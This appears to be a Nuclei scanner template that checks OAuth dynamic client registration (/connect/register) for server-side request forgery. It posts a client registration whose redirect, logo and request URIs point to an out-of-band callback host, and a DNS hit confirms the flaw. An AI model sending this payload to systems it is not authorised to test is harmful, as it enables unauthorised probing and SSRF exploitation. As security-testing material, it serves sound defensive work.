id: ssrf-via-oauth-misconfig info: name: SSRF due to misconfiguration in OAuth author: KabirSuda severity: medium description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. tags: misconfig,oob,oauth reference: https://portswigger.net/research/hidden-oauth-attack-vectors requests: - raw: - | POST /connect/register HTTP/1.1 Host: {{Hostname}} Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept-Language: en-US,en;q=0.9 Connection: close { "application_type": "web", "redirect_uris": ["https://{{interactsh-url}}/callback"], "client_name": "{{Hostname}}", "logo_uri": "https://{{interactsh-url}}/favicon.ico", "subject_type": "pairwise", "token_endpoint_auth_method": "client_secret_basic", "request_uris": ["https://{{interactsh-url}}"] } matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"